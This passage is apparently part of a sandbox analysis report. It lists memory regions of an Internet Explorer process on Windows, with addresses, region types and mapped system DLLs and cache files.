region_type = private name = "private_0x0000000003340000" filename = "" Region: id = 1252 start_va = 0x3350000 end_va = 0x3350fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 1253 start_va = 0x3360000 end_va = 0x3360fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003360000" filename = "" Region: id = 1254 start_va = 0x3370000 end_va = 0x3370fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003370000" filename = "" Region: id = 1255 start_va = 0x3380000 end_va = 0x3382fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 1256 start_va = 0x3390000 end_va = 0x3392fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 1257 start_va = 0x33a0000 end_va = 0x33a2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 1258 start_va = 0x33b0000 end_va = 0x37affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033b0000" filename = "" Region: id = 1259 start_va = 0x38b0000 end_va = 0x48effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1260 start_va = 0x48f0000 end_va = 0x49effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048f0000" filename = "" Region: id = 1261 start_va = 0x49f0000 end_va = 0x49f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049f0000" filename = "" Region: id = 1262 start_va = 0x4a00000 end_va = 0x4a00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 1263 start_va = 0x4a10000 end_va = 0x4a10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a10000" filename = "" Region: id = 1264 start_va = 0x4a20000 end_va = 0x4a20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a20000" filename = "" Region: id = 1265 start_va = 0x4a30000 end_va = 0x4a30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 1266 start_va = 0x4a40000 end_va = 0x4a40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a40000" filename = "" Region: id = 1267 start_va = 0x4a50000 end_va = 0x4a50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a50000" filename = "" Region: id = 1268 start_va = 0x4a60000 end_va = 0x4a60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a60000" filename = "" Region: id = 1269 start_va = 0x4a70000 end_va = 0x4a70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a70000" filename = "" Region: id = 1270 start_va = 0x4a80000 end_va = 0x4a80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a80000" filename = "" Region: id = 1271 start_va = 0x4a90000 end_va = 0x4a90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a90000" filename = "" Region: id = 1272 start_va = 0x4aa0000 end_va = 0x4aa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004aa0000" filename = "" Region: id = 1273 start_va = 0x4ab0000 end_va = 0x4ab0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ab0000" filename = "" Region: id = 1274 start_va = 0x4ac0000 end_va = 0x4ac0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ac0000" filename = "" Region: id = 1275 start_va = 0x4ad0000 end_va = 0x4ad0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ad0000" filename = "" Region: id = 1276 start_va = 0x4ae0000 end_va = 0x4ae0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ae0000" filename = "" Region: id = 1277 start_va = 0x4af0000 end_va = 0x4af0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 1278 start_va = 0x4b00000 end_va = 0x4b00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 1279 start_va = 0x4b10000 end_va = 0x4b10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 1280 start_va = 0x4b20000 end_va = 0x4b20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 1281 start_va = 0x4b30000 end_va = 0x4b30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 1282 start_va = 0x4b40000 end_va = 0x4b40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b40000" filename = "" Region: id = 1283 start_va = 0x4b50000 end_va = 0x4b50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 1284 start_va = 0x4b60000 end_va = 0x4b60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b60000" filename = "" Region: id = 1285 start_va = 0x4b70000 end_va = 0x4b72fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b70000" filename = "" Region: id = 1286 start_va = 0x4b80000 end_va = 0x4b80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 1287 start_va = 0x4b90000 end_va = 0x4b90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b90000" filename = "" Region: id = 1288 start_va = 0x4ba0000 end_va = 0x4ba0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ba0000" filename = "" Region: id = 1289 start_va = 0x4bb0000 end_va = 0x4bb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bb0000" filename = "" Region: id = 1290 start_va = 0x4bc0000 end_va = 0x4bc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bc0000" filename = "" Region: id = 1291 start_va = 0x4bd0000 end_va = 0x4bd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bd0000" filename = "" Region: id = 1292 start_va = 0x4be0000 end_va = 0x4be0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004be0000" filename = "" Region: id = 1293 start_va = 0x4bf0000 end_va = 0x4bf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bf0000" filename = "" Region: id = 1294 start_va = 0x4c00000 end_va = 0x4c00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 1295 start_va = 0x4c10000 end_va = 0x4c10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c10000" filename = "" Region: id = 1296 start_va = 0x4c20000 end_va = 0x4c20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c20000" filename = "" Region: id = 1297 start_va = 0x4c30000 end_va = 0x4c30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c30000" filename = "" Region: id = 1298 start_va = 0x4c40000 end_va = 0x4c40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c40000" filename = "" Region: id = 1299 start_va = 0x4c50000 end_va = 0x4c52fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c50000" filename = "" Region: id = 1300 start_va = 0x4c60000 end_va = 0x4c62fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c60000" filename = "" Region: id = 1301 start_va = 0x4c70000 end_va = 0x4c70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c70000" filename = "" Region: id = 1302 start_va = 0x4c80000 end_va = 0x4c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 1303 start_va = 0x4c90000 end_va = 0x4c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c90000" filename = "" Region: id = 1304 start_va = 0x4ca0000 end_va = 0x4ca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ca0000" filename = "" Region: id = 1305 start_va = 0x4cb0000 end_va = 0x4cb4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cb0000" filename = "" Region: id = 1306 start_va = 0x4cc0000 end_va = 0x4cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004cc0000" filename = "" Region: id = 1307 start_va = 0x4ce0000 end_va = 0x4ce0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ce0000" filename = "" Region: id = 1308 start_va = 0x4cf0000 end_va = 0x4cf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cf0000" filename = "" Region: id = 1309 start_va = 0x4d00000 end_va = 0x4d00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d00000" filename = "" Region: id = 1310 start_va = 0x4d10000 end_va = 0x4d10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d10000" filename = "" Region: id = 1311 start_va = 0x4d20000 end_va = 0x4d20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 1312 start_va = 0x4d30000 end_va = 0x4d36fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d30000" filename = "" Region: id = 1313 start_va = 0x4d40000 end_va = 0x4d4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d40000" filename = "" Region: id = 1314 start_va = 0x4d60000 end_va = 0x4d62fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d60000" filename = "" Region: id = 1315 start_va = 0x4d70000 end_va = 0x4d73fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1316 start_va = 0x4d80000 end_va = 0x4d96fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db") Region: id = 1317 start_va = 0x4da0000 end_va = 0x4da0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004da0000" filename = "" Region: id = 1318 start_va = 0x4db0000 end_va = 0x4db3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1319 start_va = 0x4dc0000 end_va = 0x4dc2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004dc0000" filename = "" Region: id = 1320 start_va = 0x4dd0000 end_va = 0x4ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004dd0000" filename = "" Region: id = 1321 start_va = 0x4de0000 end_va = 0x4edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004de0000" filename = "" Region: id = 1322 start_va = 0x4ee0000 end_va = 0x4fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ee0000" filename = "" Region: id = 1323 start_va = 0x4fe0000 end_va = 0x50bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1324 start_va = 0x50c0000 end_va = 0x50c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msfeedsbs.dll.mui" filename = "\\Windows\\System32\\en-US\\msfeedsbs.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msfeedsbs.dll.mui") Region: id = 1325 start_va = 0x50d0000 end_va = 0x50d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050d0000" filename = "" Region: id = 1326 start_va = 0x50e0000 end_va = 0x50e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050e0000" filename = "" Region: id = 1327 start_va = 0x50f0000 end_va = 0x50f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050f0000" filename = "" Region: id = 1328 start_va = 0x5100000 end_va = 0x510ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 1329 start_va = 0x5110000 end_va = 0x520ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005110000" filename = "" Region: id = 1330 start_va = 0x5210000 end_va = 0x530ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005210000" filename = "" Region: id = 1331 start_va = 0x5310000 end_va = 0x540ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005310000" filename = "" Region: id = 1332 start_va = 0x5410000 end_va = 0x580afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005410000" filename = "" Region: id = 1333 start_va = 0x5810000 end_va = 0x590ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005810000" filename = "" Region: id = 1334 start_va = 0x5910000 end_va = 0x5954fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 1335 start_va = 0x5960000 end_va = 0x59edfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1336 start_va = 0x59f0000 end_va = 0x5beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000059f0000" filename = "" Region: id = 1337 start_va = 0x5c00000 end_va = 0x5c01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005c00000" filename = "" Region: id = 1338 start_va = 0x5c10000 end_va = 0x5c11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005c10000" filename = "" Region: id = 1339 start_va = 0x5c20000 end_va = 0x5c4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005c20000" filename = "" Region: id = 1340 start_va = 0x5d50000 end_va = 0x5e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d50000" filename = "" Region: id = 1341 start_va = 0x5e50000 end_va = 0x6341fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005e50000" filename = "" Region: id = 1342 start_va = 0x6350000 end_va = 0x6d13fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006350000" filename = "" Region: id = 1343 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1344 start_va = 0x7fff0000 end_va = 0x87ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1345 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1346 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1347 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1348 start_va = 0x7ff6eb8e0000 end_va = 0x7ff6eb9a9fff monitored = 0 entry_point = 0x7ff6eb8e21f0 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe") Region: id = 1349 start_va = 0x7ff864d50000 end_va = 0x7ff864d65fff monitored = 0 entry_point = 0x7ff864d53a10 region_type = mapped_file name = "msfeedsbs.dll" filename = "\\Windows\\System32\\msfeedsbs.dll" (normalized: "c:\\windows\\system32\\msfeedsbs.dll") Region: id = 1350 start_va = 0x7ff865110000 end_va = 0x7ff8651d4fff monitored = 0 entry_point = 0x7ff865111640 region_type = mapped_file name = "msfeeds.dll" filename = "\\Windows\\System32\\msfeeds.dll" (normalized: "c:\\windows\\system32\\msfeeds.dll") Region: id = 1351 start_va = 0x7ff866030000 end_va = 0x7ff8677bcfff monitored = 0 entry_point = 0x7ff866230f70 region_type = mapped_file name = "mshtml.dll" filename = "\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll") Region: id = 1352 start_va = 0x7ff8677c0000 end_va = 0x7ff867971fff monitored = 0 entry_point = 0x7ff86781b1c0 region_type = mapped_file name = "ieapfltr.dll" filename = "\\Windows\\System32\\ieapfltr.dll" (normalized: "c:\\windows\\system32\\ieapfltr.dll") Region: id = 1353 start_va = 0x7ff867ba0000 end_va = 0x7ff86886cfff monitored = 0 entry_point = 0x7ff867cee880 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 1354 start_va = 0x7ff86e930000 end_va = 0x7ff86e93dfff monitored = 0 entry_point = 0x7ff86e934c60 region_type = mapped_file name = "tokenbinding.dll" filename = "\\Windows\\System32\\tokenbinding.dll" (normalized: "c:\\windows\\system32\\tokenbinding.dll") Region: id = 1355 start_va = 0x7ff86e980000 end_va = 0x7ff86e9bdfff monitored = 0 entry_point = 0x7ff86e989650 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 1356 start_va = 0x7ff871ab0000 end_va = 0x7ff871ac3fff monitored = 0 entry_point = 0x7ff871ab3710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 1357 start_va = 0x7ff871b60000 end_va = 0x7ff871b7dfff monitored = 0 entry_point = 0x7ff871b6ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 1358 start_va = 0x7ff872470000 end_va = 0x7ff87247bfff monitored = 0 entry_point = 0x7ff8724735c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1359 start_va = 0x7ff873b20000 end_va = 0x7ff873cd7fff monitored = 0 entry_point = 0x7ff873b8e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1360 start_va = 0x7ff8740d0000 end_va = 0x7ff87435dfff monitored = 0 entry_point = 0x7ff8741a0f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1361 start_va = 0x7ff875650000 end_va = 0x7ff87569ffff monitored = 0 entry_point = 0x7ff875652580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 1362 start_va = 0x7ff8756a0000 end_va = 0x7ff875b3ffff monitored = 0 entry_point = 0x7ff875738740 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 1363 start_va = 0x7ff875b40000 end_va = 0x7ff875b89fff monitored = 0 entry_point = 0x7ff875b45800 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 1364 start_va = 0x7ff875b90000 end_va = 0x7ff875bf9fff monitored = 0 entry_point = 0x7ff875ba5e90 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 1365 start_va = 0x7ff875c70000 end_va = 0x7ff875ee3fff monitored = 0 entry_point = 0x7ff875ce0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 1366 start_va = 0x7ff875ef0000 end_va = 0x7ff875fe8fff monitored = 0 entry_point = 0x7ff875f38000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 1367 start_va = 0x7ff876220000 end_va = 0x7ff876499fff monitored = 0 entry_point = 0x7ff87623a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 1368 start_va = 0x7ff877b00000 end_va = 0x7ff877bcdfff monitored = 0 entry_point = 0x7ff877b314c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 1369 start_va = 0x7ff877c00000 end_va = 0x7ff877c14fff monitored = 0 entry_point = 0x7ff877c02c90 region_type = mapped_file name = "settingsyncpolicy.dll" filename = "\\Windows\\System32\\SettingSyncPolicy.dll" (normalized: "c:\\windows\\system32\\settingsyncpolicy.dll") Region: id = 1370 start_va = 0x7ff877c20000 end_va = 0x7ff877c26fff monitored = 0 entry_point = 0x7ff877c21220 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 1371 start_va = 0x7ff877c30000 end_va = 0x7ff877cc3fff monitored = 0 entry_point = 0x7ff877c42950 region_type = mapped_file name = "ieui.dll" filename = "\\Windows\\System32\\ieui.dll" (normalized: "c:\\windows\\system32\\ieui.dll") Region: id = 1372 start_va = 0x7ff877db0000 end_va = 0x7ff877db9fff monitored = 0 entry_point = 0x7ff877db14c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1373 start_va = 0x7ff878d00000 end_va = 0x7ff878d6cfff monitored = 0 entry_point = 0x7ff878d14ce0 region_type = mapped_file name = "ieshims.dll" filename = "\\Program Files\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files\\internet explorer\\ieshims.dll") Region: id = 1374 start_va = 0x7ff879040000 end_va = 0x7ff8790ebfff monitored = 0 entry_point = 0x7ff8790459c0 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\System32\\ieproxy.dll" (normalized: "c:\\windows\\system32\\ieproxy.dll") Region: id = 1375 start_va = 0x7ff879750000 end_va = 0x7ff87975bfff monitored = 0 entry_point = 0x7ff879751860 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 1376 start_va = 0x7ff879860000 end_va = 0x7ff879874fff monitored = 0 entry_point = 0x7ff879862dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1377 start_va = 0x7ff879c90000 end_va = 0x7ff879cf6fff monitored = 0 entry_point = 0x7ff879c963e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1378 start_va = 0x7ff879e70000 end_va = 0x7ff879ec4fff monitored = 0 entry_point = 0x7ff879e73fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 1379 start_va = 0x7ff87a240000 end_va = 0x7ff87a307fff monitored = 0 entry_point = 0x7ff87a2813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1380 start_va = 0x7ff87a9f0000 end_va = 0x7ff87aa27fff monitored = 0 entry_point = 0x7ff87aa08cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1381 start_va = 0x7ff87aa30000 end_va = 0x7ff87aa3afff monitored = 0 entry_point = 0x7ff87aa31d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1382 start_va = 0x7ff87aa90000 end_va = 0x7ff87aaa5fff monitored = 0 entry_point = 0x7ff87aa91b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1383 start_va = 0x7ff87ab20000 end_va = 0x7ff87ab47fff monitored = 0 entry_point = 0x7ff87ab28c10 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 1384 start_va = 0x7ff87b750000 end_va = 0x7ff87b7e1fff monitored = 0 entry_point = 0x7ff87b79a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1385 start_va = 0x7ff87bb00000 end_va = 0x7ff87be81fff monitored = 0 entry_point = 0x7ff87bb51220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1386 start_va = 0x7ff87be90000 end_va = 0x7ff87bfc5fff monitored = 0 entry_point = 0x7ff87bebf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1387 start_va = 0x7ff87da20000 end_va = 0x7ff87dadefff monitored = 0 entry_point = 0x7ff87da41c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1388 start_va = 0x7ff87db10000 end_va = 0x7ff87db45fff monitored = 0 entry_point = 0x7ff87db20070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1389 start_va = 0x7ff87e640000 end_va = 0x7ff87e7f0fff monitored = 0 entry_point = 0x7ff87e6d61a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 1390 start_va = 0x7ff87e800000 end_va = 0x7ff87e8a1fff monitored = 0 entry_point = 0x7ff87e820a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 1391 start_va = 0x7ff87e8b0000 end_va = 0x7ff87eb57fff monitored = 0 entry_point = 0x7ff87e943250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 1392 start_va = 0x7ff87eb60000 end_va = 0x7ff87eb81fff monitored = 0 entry_point = 0x7ff87eb61a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1393 start_va = 0x7ff87ec80000 end_va = 0x7ff87ed62fff monitored = 0 entry_point = 0x7ff87ecb7da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 1394 start_va = 0x7ff87f150000 end_va = 0x7ff87f1c8fff monitored = 0 entry_point = 0x7ff87f16fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1395 start_va = 0x7ff87f380000 end_va = 0x7ff87f812fff monitored = 0 entry_point = 0x7ff87f38f760 region_type = mapped_file name = "actxprxy.dll" filename = 